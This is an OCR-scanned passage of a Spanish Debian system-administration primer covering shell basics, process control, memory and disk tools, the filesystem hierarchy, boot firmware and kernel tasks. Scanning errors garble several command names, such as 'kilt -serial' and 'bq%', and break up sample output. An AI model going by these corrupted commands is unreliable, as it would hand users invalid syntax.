Si  ejecuta  g  rep  expresion  archivos  busca  en  el  contenido  de  los  archivos  y  extrae  las  lineas 
que  coinciden  con  la  expresion  regular  (revise  el  recuadro  «Expresiones  regulares»  pagina  279). 
Agregar  la  opcion  -r  activa  una  busqueda  recursiva  en  todos  los  archivos  que  contenga  el  direc¬ 
torio  que  paso  como  parametro.  Esto  permite  buscar  en  un  archivo  del  que  solo  conoce  parte  de 
su  contenido. 


B.1.4.  Gestion  de  proceso 

Si  ejecuta  ps  aux,  obtendra  una  enumeracion  de  los  procesos  actualmente  en  ejecucion  y  le 
ayudara  a  identificarlos  mostrando  su  pid  (id  de  proceso:  «process  id»).  Una  vez  que  sabe  el  pid 
de  un  proceso,  puede  ejecutar  kilt  -serial  pid  para  enviarle  una  serial  (siempre  que  sea  el 
dueno  del  proceso).  Existen  varias  senales,  las  mas  utilizadas  son  TERM  (pedido  de  terminacion 
de  forma  ordenada)  y  KILL  (finalizacion  forzada). 

El  interprete  de  ordenes  tambien  puede  ejecutar  programas  en  segundo  piano  si  la  orden  fina- 
liza  con  «&».  Cuando  utiliza  el  simbolo  «et»,  el  usuario  recupera  el  control  de  la  consola  inme- 
diatamente  aun  cuando  la  orden  continua  en  ejecucion  (escondido  del  usuario  como  un  proceso 
en  segundo  piano).  El  programa  j  obs  («trabajos»)  enumerara  los  procesos  ejecutandose  en  se¬ 
gundo  piano;  si  ejecuta  fg  %numero-de-trabajo  (por  primer  piano:  «foreground»)  recuperaraen 
primer  piano  una  orden.  Cuando  un  programa  este  ejecutandose  en  primer  piano  (ya  sea  porque 
se  lo  inicio  de  esa  forma  o  porque  se  lo  recupero  desde  segundo  piano  con  f  g)  puede  pausar  el 
proceso  y  obtener  el  control  de  la  linea  de  ordenes  con  la  combinacion  de  teclas  Control+Z.  Lue- 
go  puede  continuar  el  proceso  en  segundo  piano  con  bq%numero-de-trabajo  (por  «segundo 
plano»:  «background»). 


B.1.5.  Informacion  de  sistema:  memoria,  espacio  en  disco,  identidad 

El  programa  f  ree  («libre»)  muestra  informacion  sobre  la  memoria;  df  ( libre  en  disco:  «disk  free») 
reporta  el  espacio  en  disco  disponible  para  cada  uno  de  los  discos  montados  en  el  sistema  de 
archivos.  Ambos  poseen  la  opcion  -h  ( legible  por  humanos:  «human  readable»)  convierte  los  ta- 
manos  en  unidades  mas  legibles  (frecuentemente  mebibytes  o  gibibytes).  De  forma  similar,  el 
programa  f  ree  soporta  las  opciones  -m  y  -g  con  las  que  mostrara,  respectivamente,  los  datos  en 


mebibytes  o  gibibytes. 

$  free 

total 

used 

free 

shared 

buffers 

cached 

Mem:  1028420 

-/+  buffers/cache: 
Swap:  2771172 

1009624 

570416 

404588 

18796 

458004 

2366584 

0 

47404 

391804 
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$  df 

Filesystem 

lK-blocks 

Used 

Available 

Use% 

Mounted  on 

/dev/sda2 

9614084 

4737916 

4387796 

52% 

/ 

tmpf  s 

514208 

0 

514208 

0% 

/lib/init/ 

udev 

10240 

100 

10140 

1% 

/dev 

tmpfs 

514208 

269136 

245072 

53% 

/dev/shm 

/dev/sda5 

44552904 

36315896 

7784380 

83% 

/home 

El  programa  id  muestra  la  identidad  del  usuario  ejecutando  la  sesion  junto  con  la  lista  de  gru- 
pos  a  los  que  pertenece.  Debido  a  que  el  acceso  a  algunos  archivos  o  dispositivos  puede  estar 
limitados  a  miembros  de  ciertos  grupos,  puede  ser  util  verificar  a  que  grupos  se  pertenece. 

$  id 

uid=1000 ( rhertzog )  gid=1000 ( rhertzog )  g roups=1000 ( rhertzog ) , 24(cdrom) , 25 (floppy ), 27 ( 
sudo) , 29 (audio) , 30 (dip) , 44 (video) , 46(plugdev) , 108 ( net dev) , 109 (bluetooth) , 115 ( 
scanner) 


B.2.  Organization  de  la  jerarquia  del  sistema  de  archivos 

B.2.1.  El  directorio  ralz 

Un  sistema  Debian  esta  organizado  segun  el  estandar  de  jerarquia  de  archivos  (FHS:  «File  System 
Hierarchy  Standard))).  Este  estandar  define  el  proposito  de  cada  directorio.  Por  ejemplo,  se  des- 
criben  los  directorios  de  primer  nivel  como  sigue: 

■  /bin/:  programas  basicos; 

■  /boot/:  nucleo  Finuxy  otros  archivos  necesarios  para  las  primeras  etapas  del  proceso  de 
arranque; 

■  /dev/:  archivos  de  dispositivo; 

■  /etc/:  archivos  de  configuracion; 

■  /home/:  archivos  personales  de  los  usuarios; 

■  /lib/:  bibliotecas  basicas; 

■  /media/*:  puntos  de  montaje  para  dispositivos  removibles  (CD-ROM,  Haves  USB,  etc.); 

■  /mnt/:  punto  de  montaje  temporal; 

■  /opt/:  aplicaciones  adicionales  provistas  por  terceros; 

■  /  root/:  archivos  personales  del  administrador  (root); 

■  /  run/:  datos  volatiles  en  tiempo  de  ejecucion  que  no  persisten  entre  reinicios  (todavia  no 
incluido  en  el  FHS); 

■  / s bin/:  programas  de  sistema; 

■  /s  rv/:  datos  utilizados  por  los  servidores  en  este  sistema; 
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■  /tmp/;  archivos  temporales;  generalmente  se  vacfa  este  directorio  durante  el  arranque; 

■  /usr/:  aplicaciones;  este  directorio  esta  subdividido  en  bin,  sbin,  lib  (segun  la  misma 
logica  que  el  directorio  rafz).  Lo  que  es  mas,  /us  r/share/  contiene  datos  independientes 
de  la  arquitectura.  El  objetivo  de  /us  r/local/  es  para  que  el  administrador  instale  aplica¬ 
ciones  manualmente  sin  sobreescribir  archivos  administrados  por  el  sistema  de  paquetes 
(dpkg). 

■  /va  r/:  datos  variables  administrados  por  demonios.  Esto  incluye  archivos  de  registro,  co¬ 
las,  caches,  etc. 

■  /proc/  y  /sys/  son  especificos  del  micleo  Linux  (y  no  son  parte  del  FEIS).  El  nucleo  los 
utiliza  para  exportar  datos  a  espacio  de  usuario.  (vea  Seccion  B.3.4,  «El  espacio  de  usuario» 
pagina  480  y  Seccion  B.5,  «El  espacio  de  usuario»  pagina  484  para  explicaciones  acerca  de 
este  concepto). 


B.2.2.  El  directorio  personal  de  los  usuarios 

El  contenido  del  directorio  personal  de  un  usuario  no  esta  estandarizado,  pero  si  existen  algunas 
convenciones  notables.  Una  de  ellas  es  que  usualmente  se  refiere  al  directorio  personal  de  un 
usuario  con  una  virgulilla  («~»).  Es  util  saberlo  ya  que  los  interpretes  de  ordenes  reemplazan 
una  virgulilla  automaticamente  con  el  directorio  correcto  (generalmente  /hom e/ usuario/). 

Tradicionalmente,  las  aplicaciones  almacenan  sus  archivos  de  configuracion  en  el  directorio 
personal  del  usuario,  pero  sus  nombres  generalmente  comienzan  con  un  punto  (por  ejemplo, 
el  cliente  de  correo  mutt  almacena  su  configuracion  el  -/.muttrc).  Tenga  en  cuenta  que  los 
nombres  de  archivos  que  comienzan  con  un  punto  estan  escondidos  de  forma  predeterminada; 
solo  seran  enumerados  por  Is  cuando  utilice  la  opcion  -ay  por  los  gestores  graficos  de  archivos 
cuando  les  indique  que  muestren  archivos  ocultos. 

Algunos  programas  tambien  utilizan  multiples  archivos  de  configuracion  organizados  en  un  di¬ 
rectorio  (por  ejemplo:  -/ .  ssh/).  Algunas  aplicaciones  (como  el  navegador  web  Iceweasel)  tam¬ 
bien  utlizaran  su  directorio  para  almacenar  un  cache  de  datos  descargados.  Esto  significa  que 
estos  directories  pueden  llegar  a  utilizar  mucho  espacio  en  disco. 

Estos  archivos  de  configuracion  almacenados  directamente  en  el  directorio  personal  de  los  usua¬ 
rios,  a  los  que  se  refieren  colectivamente  como  «dotfiles»  (« archivos  punto »),  son  tan  populares 
al  punto  que  estos  directories  pueden  estar  atiborrados  de  ellos.  Afortunadamente,  se  desarro- 
116  la  «Especificacion  de  directorio  base  XDG»  («XDG  Base  Directory  Specification)))  gracias  a  un 
esfuerzo  colectivo  bajo  la  tutela  de  FreeDesktop.org,  una  convencion  que  intenta  limpiar  estos 
archivos  y  directories.  Esta  especificacion  indica  que  se  debe  almacenar  los  archivos  de  confi¬ 
guracion  bajo  -/ .  config,  archivos  de  cache  bajo  -/ .  cache  y  archivos  de  dato  de  aplicaciones 
bajo  -/ .  local  (o  subdirectories  de  los  mismos).  Esta  convencion  esta  ganando  popularidad  len- 
tamente  y  varias  aplicaciones  (especialmente  las  graficas)  ya  comenzaron  a  seguirla. 

Los  escritorios  graficos  generalmente  muestran  en  el  escritorio  (es  decir,  lo  que  se  ve  cuando  se 
cierran  o  minimizan  todas  las  aplicaciones)  el  contenido  del  directorio  -/Desktop/  (o  el  termino 
apropiado  si  el  sistema  esta  configurado  en  otro  idioma  distinto  al  ingles). 
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Finalmente,  el  sistema  de  correo  a  veces  almacena  sus  correos  entrantes  en  un  directorio  ~/ 
Mail/. 


B.3.  Funcionamiento  interno  de  un  equipo:  las  diferentes  capas  involucra- 
das 

Generalmente  se  considera  a  un  equipo  como  algo  bastante  abstracto,  y  la  interfaz  visible  al 
exterior  es  mucho  mas  simple  que  su  complejidad  interna.  Esta  complejidad  proviene,  en  parte, 
de  la  cantidad  de  partes  involucradas.  Sin  embargo,  podemos  visualizar  estas  piezas  en  capas, 
donde  cada  capa  solo  interactua  con  aquellas  inmediatamente  sobre  y  bajo  ella. 

Un  usuario  final  puede  vivir  sin  saber  estos  detalles...  siempre  que  todo  funcione.  Cuando  nos 
enfrentamos  con  un  problema  como  «jlnternet  no  anda!»,  lo  primero  que  debemos  hacer  es 
identificar  en  que  capa  se  origina  el  problema.  ^Esta  funcionando  la  tarjeta  de  red  (hardware)? 
^Es  reconocida  por  el  equipo?  ^El  nucleo  Linux  la  ve?  ^Los  parametros  de  red  configurados  son 
correctos?  Todas  estas  pregun tas  aislan  una  capa  apropiaday  se  enfocan  en  una  fuente  potencial 
del  problema. 


B.3.'  La  capa  mas  profunda:  el  hardware 

Comencemos  recordando  basicamente  que  una  maquina  es,  primero  y  principal,  un  conjunto 
de  elementos  de  hardware.  Generalmente  tendra  una  placa  principal  (conocida  como  placa  base: 
«motherboard»)  con  uno  (o  mas)  procesadores,  algo  de  RAM,  controladores  de  dispositivos  y 
puertos  de  extension  para  placas  opcionales  (para  otros  controladores  de  dispositivos).  Los  mas 
notables  entre  estos  controladores  son  IDE  (ATA  paralelo),  SCSI  y  ATA  Serial  para  conectar  dispo¬ 
sitivos  de  almacenamiento  como  discos  duros.  Entre  otros  controladores  encontraremos  a  USB, 
que  es  capaz  de  albergar  una  gran  variedad  de  dispositivos  (desde  camaras  web  a  termometros, 
desde  teclados  a  sistemas  de  automatizacion  hogarena)  y  IEEE  1394  (Firewire).  Estos  controla¬ 
dores  frecuentemente  permiten  conectar  varios  dispositivos  por  lo  que  se  conoce  al  subsistema 
completo  gestionado  por  un  controlador  como  «canal»  («bus»).  Las  placas  opcionales  incluyen 
tarjetas  graficas  (en  las  que  conectara  pantallas  y  monitores),  tarjetas  de  sonido,  tarjetas  de  in¬ 
terfaz  de  red,  etc.  Algunas  placas  principales  son  prefabricadas  con  estas  funcionalidades  y  no 
necesitan  placas  opcionales. 


EN  LA  PRACTICA 

Revision  del 
funcionamiento  del 
hardware 


Puede  ser  complicado  revisar  que  una  porcion  de  hardware  funciona.  Por  el  otro 
lado,  probar  que  no  funciona  a  veces  es  muy  simple. 

Un  disco  duro  esta  hecho  de  platos  giratorios  y  cabezas  magneticas  moviles.  Cuan¬ 
do  se  enciende  un  disco  duro,  el  motor  de  las  placas  genera  un  zumbido  caracteri's- 
tico.  Tambien  disipa  energla  en  forma  de  calor.  Por  lo  tanto,  un  disco  duro  que  se 
mantiene  frfo  y  silencioso  al  encender  esta  roto. 
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Las  tarjetas  de  red  frecuentemente  incluyen  LEDs  que  muestran  el  estado  del  en¬ 
lace.  Si  tiene  un  cable  conectado  que  lleva  a  un  switch  o  hub  de  red  funcional,  al 
menos  un  LED  estara  encendido.  Si  ningun  LED  enciende,  la  tarjeta  en  si,  el  dispo- 
sitivo  de  red  o  el  cable  entre  ellos  tiene  una  falla.  El  siguiente  paso,  obviamente,  es 
probar  cada  componente  de  forma  individual. 

Algunas  placas  opcionales  —  especialmente  las  tarjetas  de  video  3D  —  incluyen 
dispositivos  de  enfriamiento  como  disipadores  de  calor  y/o  ventiladores.  Si  el  ven- 
tilador  no  gira  aun  cuando  se  enciende  la  tarjeta,  una  explicacion  posible  es  el  so- 
brecalentamiento  de  la  tarjeta.  Esto  tambien  es  aplicable  a  el  o  los  procesadores 
principals  ubicados  en  la  placa  principal. 


B.3.2.  El  iniciador:  el  BIOS  o  UEFI 

El  hardware,  por  si  mismo,  no  es  capaz  de  realizar  tareas  utiles  sin  un  software  asociado  que  lo 
maneje.  El  proposito  de  los  sistemas  operativos  y  las  aplicaciones  es  controlar  e  interactuar  con 
el  hardware.  Estos,  sin  embargo,  necesitan  hardware  funcional  para  ejecutar. 

Esta  simbiosis  entre  el  hardware  y  el  software  no  ocurre  por  si  sola.  Cuando  recien  se  enciende  el 
equipo  es  necesario  cierta  configuracion  inicial.  Este  rol  es  asumido  por  la  BIOS  o  UEFI,  una  parte 
de  software  embebido  en  la  placa  base  que  se  ejecuta  automaticamente  cuando  se  enciende.  Su 
tarea  principal  es  buscar  el  software  y  cederle  el  control.  Normalmente  en  el  caso  de  la  BIOS, 
esto  involucra  buscar  el  primer  disco  duro  con  un  sector  de  arranque  (tambien  conocido  como 
registro  maestro  de  arranque  o  MBR:  «Master  Boot  Record»),  cargar  dicho  sector  y  ejecutarlo.  De 
alii  en  adelante,  usualmente  no  se  utiliza  la  BIOS  (hasta  el  proximo  arranque).  En  el  caso  de  UEFI, 
el  proceso  conlleva  buscar  en  los  discos  para  encontrar  la  particion  dedicada  a  EFI  que  contiene 
las  aplicaciones  que  EFI  ejecutara  mas  adelante. 


HERRAMIENTA 


«Setup»,  la  herramienta 
de  configuracion  del 


BIOS/UEFI 


El  BIOS/UEFI  tambien  contiene  un  software  llamado  «Setup»,  disenado  para  per- 
mitir  configurar  aspectos  del  equipo.  En  particular,  permite  elegir  el  dispositivo  de 
arranque  preferido  (por  ejemplo,  un  disco  flexible  o  dispositivo  CD-ROM),  confi¬ 
gurar  el  reloj  del  sistema,  etc.  Iniciar  «Setup»  usualmente  involucra  presionar  una 
tecla  tan  pronto  como  enciende  el  equipo.  Generalmente  esta  tecla  es  Del  o  Esc, 
pero  a  veces  tambien  puede  ser  F2  o  F10.  La  mayoria  de  las  veces,  la  tecla  correcta 
aparece  brevemente  en  la  pantalla  durante  el  arranque. 


El  sector  de  arranque  (o  la  particion  EFI),  por  su  parte,  contiene  otro  software  pequeno  llamado 
el  gestor  de  arranque,  cuyo  proposito  es  encontrar  y  ejecutar  un  sistema  operativo.  Debido  a 
que  dicho  gestor  de  arranque  no  esta  embebido  en  la  placa  principal  sino  que  se  lo  carga  desde 
el  disco,  puede  ser  mas  inteligente  que  el  BIOS,  lo  que  explica  porque  el  BIOS  no  carga  el  siste¬ 
ma  operativo  por  su  cuenta.  Por  ejemplo,  el  gestor  de  arranque  (frecuentemente  GRUB  en  los 
sistemas  Linux)  puede  enumerar  los  sistemas  operativos  disponibles  y  pedirle  al  usuario  que 
elija  uno.  Usualmente,  provee  un  tiempo  de  espera  y  una  opcion  predeterminada.  A  veces  el 
usuario  tambien  puede  decidir  agregar  parametros  que  pasarle  al  nucleo,  etc.  Eventualmente, 
se  encuentra  el  nucleo,  se  lo  carga  en  memoria  y  se  lo  ejecuta. 
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NOTE  UEF1  es  un  desarrollo  relativamente  reciente.  La  mayori'a  de  [os  ordenadores  nuevos 
UEFI  un  reemplazo  soportaran  UEFI,  pero  normalmente  soportan  tambien  arranque  por  BIOS  para  ase- 
moderno  a  la  BIOS  gurar  compatibilidad  hacia  atras  con  [os  sistemas  operativos  que  todavi'a  no  estan 
listos  para  sacar  partido  a  UEFI. 

Este  nuevo  sistema  se  deshace  de  algunas  de  las  limitaciones  del  arranque  BIOS: 
con  la  parte  util  de  la  particion  dedicada,  [os  gestores  de  arranque  ya  no  necesitan 
trucos  especiales  para  adaptarse  en  un  pequeno  master  boot  record  y  hallar  el 
kernel  para  arrancar.  Aun  mejor,  con  una  adecuada  construction  de  kernel  de  Linux, 
UEFI  puede  arrancar  directamente  el  kernel  sin  ningun  gestor  de  arranque  como 
intermediario.  UEFI  tambien  es  la  base  principal  usada  para  usar  Secure  Boot ,  una 
tecnologla  que  te  asegura  ejecutar  solo  software  validado  por  el  vendedor  de  tu 
sistema  operativo. 


El  BIOS/UEFI  tambien  esta  a  cargo  de  detectar  e  inicializar  algunos  dispositivos.  Obviamente, 
esto  incluye  los  dispositivos  IDE/SATA  (generalmente  discos  duros  y  dispositivos  CD-ROM),  pe¬ 
ro  tambien  dispositivos  PCI.  Normalmente,  se  enumeran  en  pantalla  los  dispositivos  detectados 
durante  el  proceso  de  arranque.  Si  la  lista  pasa  demasiado  rapido,  utilice  la  tecla  Pause  para  con- 
gelarla  el  tiempo  suficiente  para  leerla.  Si  faltan  dispositivos  PCI  instalados,  es  un  mal  augurio. 
En  el  peor  de  los  casos  el  dispositivo  tiene  una  falla.  En  el  mejor  de  los  casos,  simplemente  es 
incompatible  con  la  version  del  BIOS  o  la  placa  principal.  Las  especificaciones  PCI  evolucionan 
y  no  se  garantiza  que  las  placas  principales  antiguas  sean  compatibles  con  dispositivos  PCI  mas 
nuevos. 


B.3.3.  El  nucleo 

Tanto  el  BIOS/UEFI  como  el  gestor  de  arranque  solo  ejecutan  por  unos  segundos  cada  uno;  ahora 
llegamos  al  primer  software  que  ejecuta  por  mas  tiempo:  el  nucleo  del  sistema  operativo.  Este 
nucleo  asume  el  rol  del  director  en  una  orquesta  y  asegura  la  coordinacion  entre  el  hardware  y 
el  software.  Este  papel  involucra  varias  tareas  que  incluyen:  administrar  el  hardware,  gestionar 
procesos,  usuarios  y  permisos,  el  sistema  de  archivos,  etc.  El  nucleo  provee  una  base  comun  a 
todos  los  otros  programas  en  el  sistema. 


B.3.4.  El  espacio  de  usuario 

Si  bien  todo  lo  que  ocurre  fuera  del  nucleo  puede  agruparse  bajo  el  nombre  «espacio  de  usuario», 
todavi'a  podemos  separarlo  en  capas  de  software.  Sin  embargo,  sus  interacciones  son  mas  com- 
plejas  que  antes  y  la  clasificacion  puede  no  ser  tan  simple.  Una  aplicacion  normalmente  utiliza 
bibliotecas,  que  a  su  vez  involucran  al  nucleo,  pero  la  comunicacion  tambien  puede  involucrar 
otros  programas  o  inclusive  bibliotecas  que  interactuan  entre  si. 
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B.4.  Algunas  tareas  administradas  por  el  nucleo 


B.4.1  Administracion  del  hardware 

El  nucleo  tiene,  antes  que  nada,  la  tarea  de  controlar  las  partes  del  hardware,  detectarlas,  encen- 
derlas  cuando  se  enciende  el  equipo,  etc.  Tambien  los  pone  a  disposicion  del  software  de  mas  alto 
nivel  con  una  interfaz  de  programacion  simplificada  para  que  las  aplicaciones  puedan  aprove- 
char  dispositivos  sin  tener  que  preocuparse  por  detalles  como  cual  puerto  de  extension  es  aquel 
en  el  que  esta  conectada  una  tarjeta.  La  interfaz  de  programacion  tambien  provee  una  capa  de 
abstraction;  permite,  por  ejemplo,  que  el  software  de  videoconferencias  utilice  una  camara  web 
independientemente  de  su  modelo  y  fabricante.  El  software  puede  utilizar  simplemente  la  in¬ 
terfaz  video  para  Linux  (V4L:  «Video  for  Linux»)  y  el  nucleo  traduce  las  llamadas  a  las  funciones 
de  esta  interfaz  a  las  ordenes  de  hardware  reales  que  necesita  la  camara  especifica  que  esta 
utilizando. 

El  nucleo  exporta  muchos  detalles  sobre  el  hardware  detectado  a  traves  de  los  sistemas  de  archi- 
vos  virtuales  /proc/  y  /sys/.  Muchas  herramientas  resumen  estos  detalles.  Entre  ellas,  Ispci 
(en  el  paquete  pciutils )  enumera  los  dispositivos  PCI,  tsusb  (en  el  paquete  usbutils)  enumera 
los  dispositivos  USB  y  Ispcmcia  (en  el  paquete  pcmciautils )  enumera  las  tarjetas  PCMCIA.  Estas 
herramientas  son  muy  utiles  para  identificar  el  modelo  exacto  de  un  dispositivo.  Esta  identifi- 
cacion  permite  realizar  busquedas  mas  precisas  en  la  web  lo  que,  a  su  vez,  lleva  a  documentos 
mas  relevantes. 


Ejemplo  B.1  Ejemplo  de  informacion  provista  por  Ispci  y  Isusb 


$  Ispci 
[■■■] 

00:02.1  Display  controller:  Intel  Corporation  Mobile  915GM/GMS/910GML  Express 
Graphics  Controller  (rev  03) 

00:1c. 0  PCI  bridge:  Intel  Corporation  82801FB/FBM/FR/FW/FRW  (ICH6  Family)  PCI  Express 
Port  1  (rev  03) 

00 : Id . 0  USB  Controller:  Intel  Corporation  82801FB/FBM/FR/ FW/FRW  (ICH6  Family)  USB 
UHCI  #1  (rev  03) 

[■■  ■] 

01:00.0  Ethernet  controller:  Broadcom  Corporation  NetXtreme  BCM5751  Gigabit  Ethernet 
PCI  Express  (rev  01) 

02:03.0  Network  controller:  Intel  Corporation  PRO/Wireless  2200BG  Network  Connection 
(rev  05) 

$  Isusb 

Bus  005  Device  004:  ID  413c:a005  Dell  Computer  Corp. 

Bus  005  Device  008:  ID  413c:9001  Dell  Computer  Corp. 

Bus  005  Device  007:  ID  045e:00dd  Microsoft  Corp. 

Bus  005  Device  006:  ID  046d:c03d  Logitech,  Inc. 

[■■■] 

Bus  002  Device  004:  ID  413c:8103  Dell  Computer  Corp.  Wireless  350  Bluetooth 
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Estos  programas  tienen  una  opcion  -v,  que  mostrara  informacion  mucho  mas  detallada  (pero 
generalmente  innecesaria).  Finalmente,  el  programa  Isdev  (en  el  paquete  procinfo)  enumera  los 
recuros  de  comunicacion  utilizados  por  los  dispositivos. 

Las  aplicaciones  frecuentemente  acceden  a  los  dispositivos  a  traves  de  archivos  especiales  crea- 
dos  en  /dev/  (revise  el  recuadro  «Permisos  de  acceso  a  dispositivos»  pagina  169).  Estos  son 
archivos  especiales  que  representan  discos  (por  ejemplo:  /dev/hda  y  /dev/sdc),  particiones 
(/dev/hdal  o  /dev/sdc3,  ratones  (/dev/input/mouse0),  teclados  (/dev/input/event0),  tarje- 
tas  de  sonido  (/dev/snd/*),  puertos  seriales  (/dev/ttyS*),  etc. 


B.4.2.  Sistemas  de  archivos 

Los  sistemas  de  archivos  son  uno  de  los  aspectos  mas  destacados  del  nucleo.  Los  sistemas  Unix 
agrupan  todos  los  archivos  que  almacenan  en  una  jerarquia  unica,  lo  que  permite  a  los  usuarios 
(y  las  aplicaciones)  acceder  a  los  datos  simplemente  conociendo  su  ubicacion  dentro  de  dicha 
jerarquia. 

El  nombre  del  punto  de  partida  de  este  arbol  jerarquico  es  la  raiz,  /.  Este  directorio  puede  te- 
ner  subdirectories  con  nombres.  Por  ejemplo,  el  nombre  del  subdirectorio  home  de  /  es  /home/. 
Este  subdirectorio,  a  su  vez,  puede  contener  otros  subdirectorios  y  asi  sucesivamente.  Cada  di¬ 
rectorio  tambien  puede  contener  archivos,  donde  se  almacenaran  los  datos  en  si.  Por  lo  tanto,  el 
nombre  /home/ rmas/Desktop/heUlo .  txt  se  refiere  al  archivo  hello.txt  almacenado  en  el  sub¬ 
directorio  Desktop  del  subdirectorio  rmas  del  directorio  home  presente  en  la  raiz.  El  nucleo 
traduce  este  sistema  de  nombres  en  el  almacenamiento  fisico  real  en  un  disco. 

A  diferencia  de  otros  sistemas,  existe  solo  una  jerarquia  de  este  tipo  que  puede  integrar  da¬ 
tos  de  varios  discos.  Se  utiliza  uno  de  estos  discos  como  raiz  y  los  demas  son  «montados»  en 
directorios  de  la  jerarquia  (el  programa  Unix  se  llama  mount);  luego  estos  otros  discos  esta- 
ran  disponibles  bajo  estos  «puntos  de  montaje».  Esto  permite  almacenar  los  directorios  per- 
sonales  de  los  usuarios  (tradicionalmente  almacenados  en  /home/)  en  un  disco  secundario  que 
contendra  directorios  rhertzog  y  rmas.  Una  vez  que  se  monto  el  disco  en  /home/,  estos  direc¬ 
torios  estaran  disponibles  en  su  ubicacion  usual  y  continuaran  funcionando  las  rutas  como 
/home/ rmas/Desktop/hello . txt. 

Elay  muchos  sistemas  de  archivos  que  corresponden  con  muchas  formas  de  almacenar  fisicamen- 
te  los  datos  en  discos.  Los  mas  conocidos  son  ext2,  ext3  y  ext4,  pero  existen  otros.  Por  ejemplo, 
vfat  es  el  sistema  de  archivos  utilizado  historicamente  por  los  sistemas  operativos  DOS  y  Win¬ 
dows,  lo  que  permite  utilizar  discos  duros  tanto  en  Debian  como  en  Windows.  En  cualquier  caso, 
un  sistema  de  archivos  debe  ser  preparado  en  un  disco  antes  que  pueda  ser  montado,  se  conoce 
esta  operacion  como  «dar  formato».  Los  programas  como  mkf  s .  ext3  (donde  mkf  s  significa  crear 
sistema  de  archivos:  «MaKe  FileSystem»)  se  encargan  de  esta  operacion.  Estos  programas  necesi- 
tan,  como  parametro,  un  archivo  de  dispositivo  que  representa  la  particion  a  la  que  dar  formato 
(por  ejemplo:  /dev/sdal).  Esta  operacion  es  destructiva  y  solo  debe  ejecutarlauna  vez,  excepto 
cuando  uno  desee  eliminar  deliberadamente  un  sistema  de  archivos  y  comenzar  nuevamente 
desde  cero. 
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Existen  tambien  sistemas  de  archivos  de  red,  como  NFS,  en  el  que  los  datos  no  son  almacena- 
dos  en  un  disco  local.  En  su  lugar,  se  transmiten  los  datos  a  traves  de  la  red  a  un  servidor  que 
los  almacena  y  obtiene  a  pedido.  La  abstraccion  del  sistema  de  archivos  evita  que  al  usuario  le 
importe:  los  archivos  continuan  disponibles  en  la  forma  jerarquica  usual. 


B.4.3.  Funciones  compartidas 

Debido  a  que  una  cantidad  de  funciones  son  utilizadas  por  todo  software,  tiene  sentido  centra- 
lizarlas  en  el  nucleo.  Por  ejemplo,  la  gestion  compartida  de  sistemas  de  archivos  permite  que 
cualquier  aplicacion  simplemente  abra  un  archivo,  sin  preocuparse  donde  esta  almacenado  fisi- 
camente  dicho  archivo.  Este  puede  estar  almacenado  en  diferentes  porciones  de  un  disco  duro, 
dividido  entre  varios  discos  duros  o  inclusive  almacenado  en  un  servidor  remoto.  Las  funciones 
de  comunicacion  compartidas  son  utilizadas  por  las  aplicaciones  para  intercambiar  datos  inde- 
pendientemente  de  la  forma  en  la  que  se  transportan  los  mismos.  Por  ejemplo,  el  transporte 
puede  ser  a  traves  de  una  combinacion  de  redes  locales  o  inalambricas  o  a  traves  de  una  linea 
telefonica  terrestre. 


B.4.4.  Gestion  de  proceso 

Un  proceso  es  una  instancia  en  ejecucion  de  un  programa.  Esto  necesita  memoria  para  alma- 
cenar  tan  to  el  programa  en  si  como  los  datos  con  los  que  trabaja.  El  nucleo  es  el  encargado  de 
crearlos  y  seguirlos.  Cuando  se  ejecuta  un  programa,  primero  el  nucleo  reserva  memoria,  car- 
ga  en  ella  el  codigo  ejecutable  desde  el  sistema  de  archivos  y  luego  inicia  la  ejecucion  de  este 
codigo.  Mantiene  informacion  sobre  este  proceso,  de  las  que  la  mas  visible  es  un  numero  de 
identificacion  conocido  como  pid  (identificador  de  proceso:  «process  identifier))). 

Los  nucleos  similares  a  Unix  (incluyendo  a  Linux),  al  igual  que  muchos  otros  sistemas  operativos 
modernos,  poseen  la  capacidad  de  ser  «multitarea».  En  otras  palabras,  permite  ejecutar  muchos 
procesos  «al  mismo  tiempo».  En  realidad  solo  hay  un  proceso  ejecutando  en  un  momento  dado, 
pero  el  nucleo  divide  el  tiempo  en  pequenas  porciones  y  ejecuta  en  orden  a  cada  proceso.  Debi¬ 
do  a  que  estas  divisiones  de  tiempo  son  muy  pequenas  (en  el  rango  de  los  milisegundos),  crean 
la  ilusion  de  procesos  ejecutando  en  paralelo,  aun  cuando  solo  estan  activos  durante  algunos 
intervalos  y  en  espera  el  resto  del  tiempo.  La  tarea  del  kernel  es  ajustar  con  mecanismos  pla- 
neados  para  mantener  esa  ilusion,  mientras  se  maximiza  el  rendimiento  global  del  sistema.  Si 
las  divisiones  de  tiempo  son  muy  extensas,  la  aplicacion  puede  que  no  responda  como  se  desea. 
Si  son  muy  pequenas,  el  sistema  perdera  tiempo  cambiando  tareas  demasiado  frecuentemen- 
te.  Se  pueden  personalizar  estas  decisiones  con  las  prioridades  de  procesos.  Los  procesos  con 
prioridad  alta  ejecutaran  por  mas  tiempo  y  en  intervalos  mas  frecuentes  que  los  procesos  con 
prioridadbaja. 


Curso  breve  de  emergencia 


483 


NOTA  La  limitacion  aqrn  descripta  solo  es  un  caso  extremo.  La  restriccion  actual  es  que, 
Sistemas  multiprocesador  en  cac^a  momenta,  solo  puede  existir  un  proceso  en  ejecucion  por  nucleo  de  proce- 
(y  variaciones)  sador.  Los  sistemas  multiprocesador,  multinucleo  o  con  «hyper-threading»  («mul- 
tihilos»)  permite  ejecutar  varios  procesos  en  paralelo.  Sin  embargo,  se  utiliza  el 
mismo  sistema  de  division  de  tiempo  para  administrar  casos  en  los  que  existan 
mas  procesos  activos  que  nucleos  de  procesador  disponibles.  Este  caso  no  es  extra- 
no:  un  sistema  basico,  aun  aquellos  mayormente  desocupados,  casi  siempre  posee 
decenas  de  procesos  en  ejecucion. 


Por  supuesto,  el  nucleo  permite  ejecutar  varias  instancias  independientes  del  mismo  programa. 
Pero  cada  una  de  ellas  solo  puede  acceder  sus  propias  divisiones  de  tiempo  y  su  propia  memoria. 
Sus  datos,  por  lo  tanto,  se  mantienen  independientes. 


B.4.5.  Gestion  de  permisos 

Los  sistemas  similares  a  Unix  tambien  son  multiusuario.  Proveen  un  sistema  que  permite  usua- 
rios  separados  y  grupos;  tambien  permite  la  capacidad  de  decidir  permitir  o  bloquear  acciones 
segtin  sus  permisos.  El  nucleo  gestiona,  para  cada  proceso,  permitiendole  controlar  los  permisos. 
La  mayor  parte  del  tiempo,  cada  proceso  es  identificado  por  el  usuario  que  lo  inicio.  Ese  proce¬ 
so  solo  puede  realizar  las  acciones  que  pueda  realizar  su  dueno.  Por  ejemplo,  intentar  abrir  un 
